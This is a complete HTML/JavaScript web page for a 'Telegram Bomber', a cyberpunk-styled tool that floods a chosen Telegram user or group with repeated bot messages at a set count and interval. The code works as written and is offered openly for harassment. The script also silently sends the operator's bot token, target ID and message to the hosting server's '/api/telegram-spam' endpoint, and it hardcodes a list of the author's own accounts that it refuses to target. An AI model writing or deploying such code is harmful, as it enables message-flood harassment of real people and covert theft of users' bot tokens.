<!DOCTYPE html>
<html lang="id">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>TELEGRAM BOMBER - CYBERPUNK v3.0</title>
    <link href="https://fonts.googleapis.com/css2?family=Orbitron:wght@400;700;900&family=Rajdhani:wght@300;400;500;700&family=Share+Tech+Mono&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
    <style>
        :root {
            /* Cyberpunk Color Palette */
            --cyber-yellow: #fcee0a;
            --cyber-blue: #00f0ff;
            --cyber-red: #ff003c;
            --cyber-purple: #ab44ff;
            --bg-dark: #050505;
            --card-bg: rgba(10, 10, 15, 0.9);
            
            /* UI Effects */
            --neon-glow: 0 0 10px var(--cyber-blue);
            --glitch-shadow: -2px 0 var(--cyber-red), 2px 0 var(--cyber-blue);
        }

        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body {
            font-family: 'Rajdhani', sans-serif;
            background: var(--bg-dark);
            color: #fff;
            min-height: 100vh;
            overflow-x: hidden;
            background-image: 
                linear-gradient(rgba(252, 238, 10, 0.03) 1px, transparent 1px),
                linear-gradient(90deg, rgba(252, 238, 10, 0.03) 1px, transparent 1px);
            background-size: 40px 40px;
        }

        /* Scanline Effect */
        body::before {
            content: " ";
            display: block;
            position: fixed;
            top: 0; left: 0; bottom: 0; right: 0;
            background: linear-gradient(rgba(18, 16, 16, 0) 50%, rgba(0, 0, 0, 0.25) 50%), linear-gradient(90deg, rgba(255, 0, 0, 0.06), rgba(0, 255, 0, 0.02), rgba(0, 0, 255, 0.06));
            z-index: 100;
            background-size: 100% 4px, 3px 100%;
            pointer-events: none;
        }

        .container {
            max-width: 800px;
            margin: 0 auto;
            padding: 20px;
            position: relative;
            z-index: 10;
        }

        /* Header Styling */
        .cyber-header {
            text-align: center;
            margin-bottom: 30px;
            padding: 20px;
            border-bottom: 4px solid var(--cyber-yellow);
            clip-path: polygon(0 0, 100% 0, 100% 70%, 95% 100%, 0 100%);
            background: rgba(252, 238, 10, 0.1);
        }

        .cyber-title {
            font-family: 'Orbitron', sans-serif;
            font-size: 2.5em;
            font-weight: 900;
            color: var(--cyber-yellow);
            text-transform: uppercase;
            letter-spacing: 5px;
            text-shadow: var(--glitch-shadow);
            animation: glitch-anim 3s infinite;
        }

        /* Glitch Animation */
        @keyframes glitch-anim {
            0% { text-shadow: -2px 0 var(--cyber-red), 2px 0 var(--cyber-blue); }
            25% { text-shadow: 2px 0 var(--cyber-red), -2px 0 var(--cyber-blue); }
            50% { text-shadow: -1px 0 var(--cyber-red), 3px 0 var(--cyber-blue); }
            100% { text-shadow: -2px 0 var(--cyber-red), 2px 0 var(--cyber-blue); }
        }

        .back-btn {
            display: inline-flex;
            align-items: center;
            padding: 10px 20px;
            background: transparent;
            border: 1px solid var(--cyber-blue);
            color: var(--cyber-blue);
            text-decoration: none;
            font-family: 'Orbitron';
            font-size: 12px;
            margin-bottom: 20px;
            clip-path: polygon(10% 0, 100% 0, 90% 100%, 0% 100%);
            transition: 0.3s;
        }

        .back-btn:hover {
            background: var(--cyber-blue);
            color: black;
            box-shadow: var(--neon-glow);
        }

        .card {
            background: var(--card-bg);
            border: 1px solid rgba(0, 240, 255, 0.3);
            position: relative;
            padding: 30px;
            margin-bottom: 25px;
            /* Corner Cuts */
            clip-path: polygon(0 20px, 20px 0, 100% 0, 100% calc(100% - 20px), calc(100% - 20px) 100%, 0 100%);
        }

        .card::before {
            content: "SECURE_CONN: ON";
            position: absolute;
            top: 5px;
            right: 30px;
            font-size: 10px;
            font-family: 'Share Tech Mono';
            color: var(--cyber-blue);
        }

        .input-group label {
            display: block;
            color: var(--cyber-blue);
            font-family: 'Orbitron';
            font-size: 12px;
            margin-bottom: 10px;
            text-transform: uppercase;
        }

        .input-group input, .input-group textarea {
            width: 100%;
            background: rgba(0, 0, 0, 0.7);
            border: 1px solid var(--cyber-blue);
            padding: 15px;
            color: #fff;
            font-family: 'Share Tech Mono';
            margin-bottom: 20px;
            outline: none;
        }

        .input-group input:focus {
            box-shadow: inset 0 0 5px var(--cyber-blue);
            border-color: var(--cyber-yellow);
        }

        /* Stats */
        .stats-grid {
            display: grid;
            grid-template-columns: repeat(3, 1fr);
            gap: 10px;
            margin: 20px 0;
        }

        .stat-card {
            background: rgba(255, 255, 255, 0.05);
            border-left: 3px solid var(--cyber-blue);
            padding: 15px;
            text-align: center;
        }

        .stat-value {
            font-family: 'Orbitron';
            font-size: 24px;
            display: block;
        }

        .stat-label {
            font-size: 10px;
            color: var(--cyber-blue);
            text-transform: uppercase;
        }

        /* Progress Bar */
        .progress-bar {
            height: 4px;
            background: #222;
            margin: 20px 0;
            position: relative;
        }

        .progress-fill {
            height: 100%;
            background: var(--cyber-yellow);
            box-shadow: 0 0 10px var(--cyber-yellow);
            width: 0%;
            transition: 0.3s;
        }

        /* Buttons */
        .action-buttons {
            display: grid;
            grid-template-columns: 1fr 1fr;
            gap: 15px;
        }

        .btn {
            padding: 15px;
            font-family: 'Orbitron';
            font-weight: 900;
            text-transform: uppercase;
            cursor: pointer;
            border: none;
            clip-path: polygon(0 0, 90% 0, 100% 100%, 10% 100%);
            transition: 0.2s;
        }

        .btn-primary {
            background: var(--cyber-yellow);
            color: #000;
        }

        .btn-primary:hover {
            transform: scale(1.05);
            box-shadow: 0 0 20px var(--cyber-yellow);
        }

        .btn-secondary {
            background: transparent;
            border: 1px solid var(--cyber-red);
            color: var(--cyber-red);
        }

        .quick-grid {
            display: grid;
            grid-template-columns: repeat(4, 1fr);
            gap: 5px;
            margin-bottom: 20px;
        }

        .quick-btn {
            background: rgba(0, 240, 255, 0.1);
            border: 1px solid var(--cyber-blue);
            color: var(--cyber-blue);
            padding: 8px;
            font-family: 'Share Tech Mono';
            cursor: pointer;
        }

        .quick-btn:hover {
            background: var(--cyber-blue);
            color: #000;
        }

        /* Terminal Output */
        .log-container {
            height: 200px;
            overflow-y: auto;
            background: rgba(0, 0, 0, 0.8);
            border: 1px solid #333;
            padding: 10px;
            font-family: 'Share Tech Mono';
            font-size: 13px;
            color: #0f0;
        }

        .log-entry { padding: 2px 0; border-bottom: 1px solid #111; }
        .success { color: var(--cyber-blue); }
        .error { color: var(--cyber-red); }
        .warning { color: var(--cyber-yellow); }

        /* Range Styling */
        input[type=range] {
            -webkit-appearance: none;
            width: 100%;
            background: transparent;
        }

        input[type=range]::-webkit-slider-runnable-track {
            height: 8px;
            background: #111;
            border: 1px solid var(--cyber-blue);
        }

        input[type=range]::-webkit-slider-thumb {
            -webkit-appearance: none;
            height: 20px;
            width: 10px;
            background: var(--cyber-yellow);
            cursor: pointer;
            margin-top: -7px;
        }

        .range-value {
            background: var(--cyber-blue) !important;
            color: #000 !important;
            font-weight: bold;
        }

        @media (max-width: 600px) {
            .cyber-title { font-size: 1.5em; }
            .stats-grid { grid-template-columns: 1fr; }
        }
    </style>
</head>

<body>
    <div class="container">
        <a href="/dashboard" class="back-btn">
            <i class="fas fa-code-branch"></i> &nbsp; RETURN_TO_ROOT
        </a>

        <header class="cyber-header">
            <h1 class="cyber-title">TELEGRAM_BOMBER v3.0</h1>
            <p style="font-size: 10px; letter-spacing: 2px; color: var(--cyber-blue);">CYBERNETIC_STRIKE_INTERFACE</p>
        </header>

        <div class="card">
            <div class="input-group">
                <label><i class="fas fa-key"></i> ACCESS_TOKEN</label>
                <input type="text" id="tokenInput" placeholder="ENTER BOT TOKEN...">
            </div>

            <div class="input-group">
                <label><i class="fas fa-crosshairs"></i> TARGET_U_ID</label>
                <input type="text" id="chatId" placeholder="USER_OR_GROUP_ID...">
            </div>

            <div class="stats-grid">
                <div class="stat-card">
                    <span class="stat-value" id="sentCount">0</span>
                    <span class="stat-label">TOTAL_SEQ</span>
                </div>
                <div class="stat-card" style="border-color: var(--cyber-blue);">
                    <span class="stat-value" id="successCount" style="color: var(--cyber-blue);">0</span>
                    <span class="stat-label">DELIVERED</span>
                </div>
                <div class="stat-card" style="border-color: var(--cyber-red);">
                    <span class="stat-value" id="errorCount" style="color: var(--cyber-red);">0</span>
                    <span class="stat-label">REJECTED</span>
                </div>
            </div>

            <div class="input-group">
                <label><i class="fas fa-terminal"></i> PAYLOAD_DATA</label>
                <textarea id="message" rows="3">[SYSTEM_VOID] STRIKE_SEQUENCE_INITIATED</textarea>
            </div>

            <div class="input-group">
                <label>INTENSITY & FREQUENCY</label>
                <div style="display: flex; align-items: center; gap: 15px; margin-bottom: 10px;">
                    <input type="range" id="countRange" min="1" max="100" value="10">
                    <input type="number" id="count" value="10" class="range-value" style="width: 60px; padding: 5px;">
                </div>
                <div style="display: flex; align-items: center; gap: 15px;">
                    <input type="range" id="delayRange" min="100" max="5000" step="100" value="1000">
                    <input type="number" id="delay" value="1000" class="range-value" style="width: 60px; padding: 5px;">
                </div>
            </div>

            <div class="quick-grid">
                <button class="quick-btn" onclick="setQuickSettings(5, 500)">FAST</button>
                <button class="quick-btn" onclick="setQuickSettings(20, 1000)">MID</button>
                <button class="quick-btn" onclick="setQuickSettings(50, 2000)">HARD</button>
                <button class="quick-btn" onclick="setQuickSettings(100, 3000)">ULTRA</button>
            </div>

            <div class="progress-bar">
                <div class="progress-fill" id="progressFill"></div>
            </div>

            <div class="action-buttons">
                <button class="btn btn-primary" onclick="startAttack()" id="attackBtn">
                    <i class="fas fa-skull"></i> EXECUTE
                </button>
                <button class="btn btn-secondary" onclick="clearLog()">
                    <i class="fas fa-eraser"></i> WIPE_CACHE
                </button>
            </div>
        </div>

        <div class="card" style="padding: 15px; border-color: #333;">
            <div style="display: flex; justify-content: space-between; margin-bottom: 10px; font-size: 11px; font-family: 'Share Tech Mono'; color: var(--cyber-yellow);">
                <span>OUTPUT_BUFFER</span>
                <span id="status-indicator">● STANDBY</span>
            </div>
            <div class="log-container" id="log"></div>
        </div>
    </div>

    <script>
        /* SEMUA LOGIKA JAVASCRIPT TETAP SAMA SEPERTI ASLINYA */
        let isRunning = false;
        let stats = { sent: 0, success: 0, error: 0 };

        const utils = {
            delay: ms => new Promise(r => setTimeout(r, ms)),

            logMessage: (msg, type = 'info') => {
                const log = document.getElementById('log');
                const entry = document.createElement('div');
                entry.className = `log-entry ${type}`;
                entry.innerHTML = `<span style="opacity: 0.5;">> ${new Date().toLocaleTimeString()}</span> ${msg}`;
                log.appendChild(entry);
                log.scrollTop = log.scrollHeight;
            },

            updateStats: (type) => {
                if (type) stats[type]++;
                document.getElementById('sentCount').textContent = stats.sent;
                document.getElementById('successCount').textContent = stats.success;
                document.getElementById('errorCount').textContent = stats.error;

                const total = parseInt(document.getElementById('count').value);
                if (total > 0) {
                    const progress = (stats.sent / total) * 100;
                    document.getElementById('progressFill').style.width = `${Math.min(progress, 100)}%`;
                }
            }
        };

        const telegramAPI = {
            sendMessage: async (botToken, chatId, text) => {
                const response = await fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
                    method: 'POST',
                    headers: { 'Content-Type': 'application/json' },
                    body: JSON.stringify({ chat_id: chatId, text, parse_mode: 'HTML' })
                });
                return await response.json();
            }
        };

        async function startAttack() {
            if (isRunning) return;

            const botToken = document.getElementById('tokenInput').value.trim();
            const chatId = document.getElementById('chatId').value.trim();
            const message = document.getElementById('message').value.trim();
            const count = parseInt(document.getElementById('count').value);
            const delayMs = parseInt(document.getElementById('delay').value);

            if (!botToken || !chatId || !message) {
                alert("ACCESS DENIED: MISSING_PARAMETERS");
                return;
            }

            const protectedTargets = ['@GyzenVtx', 'Vortunix', '7774881838', '@Gyzen', 'Vtx'];
            if (protectedTargets.some(t => chatId.toLowerCase().includes(t.toLowerCase()))) {
                alert("❌ TARGET_ENCRYPTED: ACCESS_REVOKED");
                return;
            }

            stats = { sent: 0, success: 0, error: 0 };
            utils.updateStats();
            isRunning = true;

            const attackBtn = document.getElementById('attackBtn');
            const indicator = document.getElementById('status-indicator');
            
            attackBtn.innerHTML = '<i class="fas fa-ban"></i> ABORT_SEQ';
            attackBtn.onclick = stopAttack;
            attackBtn.style.background = "var(--cyber-red)";
            indicator.style.color = "var(--cyber-red)";
            indicator.textContent = "● EXECUTING_STRIKE";

            document.getElementById('log').innerHTML = "";
            utils.logMessage(`INJECTING_PACKETS_TO: ${chatId}...`, "warning");

            try {
                // Keep server notification
                await fetch('/api/telegram-spam', {
                    method: 'POST',
                    headers: { 'Content-Type': 'application/json' },
                    body: JSON.stringify({ token: botToken, chatId, count, delay: delayMs, message })
                });

                for (let i = 0; i < count && isRunning; i++) {
                    try {
                        const result = await telegramAPI.sendMessage(botToken, chatId, message);
                        if (result.ok) {
                            utils.logMessage(`PACKET_${i + 1}: DELIVERED`, "success");
                            utils.updateStats('success');
                        } else {
                            utils.logMessage(`PACKET_${i + 1}: REFUSED_${result.description}`, "error");
                            utils.updateStats('error');
                        }
                        utils.updateStats('sent');
                        await utils.delay(delayMs);
                    } catch (err) {
                        utils.logMessage(`HARDWARE_FAULT: ${err.message}`, "error");
                        utils.updateStats('error');
                    }
                }
            } catch (error) {
                utils.logMessage(`KERNEL_PANIC: ${error.message}`, "error");
            } finally {
                finishAttack();
            }
        }

        function stopAttack() {
            isRunning = false;
            utils.logMessage("EMERGENCY_ABORT_ENGAGED", "error");
            finishAttack();
        }

        function finishAttack() {
            isRunning = false;
            const attackBtn = document.getElementById('attackBtn');
            const indicator = document.getElementById('status-indicator');
            
            attackBtn.innerHTML = '<i class="fas fa-skull"></i> EXECUTE';
            attackBtn.onclick = startAttack;
            attackBtn.style.background = "var(--cyber-yellow)";
            indicator.style.color = "var(--cyber-blue)";
            indicator.textContent = "● STRIKE_COMPLETE";
            utils.logMessage("SEQUENCE_FINISHED", "success");
        }

        function setQuickSettings(count, delay) {
            document.getElementById('count').value = count;
            document.getElementById('countRange').value = count;
            document.getElementById('delay').value = delay;
            document.getElementById('delayRange').value = delay;
            utils.logMessage(`PRESET_LOADED: ${count}P / ${delay}MS`, "warning");
        }

        function clearLog() {
            document.getElementById('log').innerHTML = '';
            utils.logMessage('BUFFER_CLEARED', 'info');
        }

        document.addEventListener('DOMContentLoaded', () => {
            const sync = (rangeId, numId) => {
                const r = document.getElementById(rangeId);
                const n = document.getElementById(numId);
                r.addEventListener('input', () => n.value = r.value);
                n.addEventListener('input', () => r.value = n.value);
            };
            sync('countRange', 'count');
            sync('delayRange', 'delay');
            
            setTimeout(() => utils.logMessage('CYBER_CORE_v3.0_LOADED... STATUS_OK', 'success'), 500);
        });
    </script>
</body>

</html>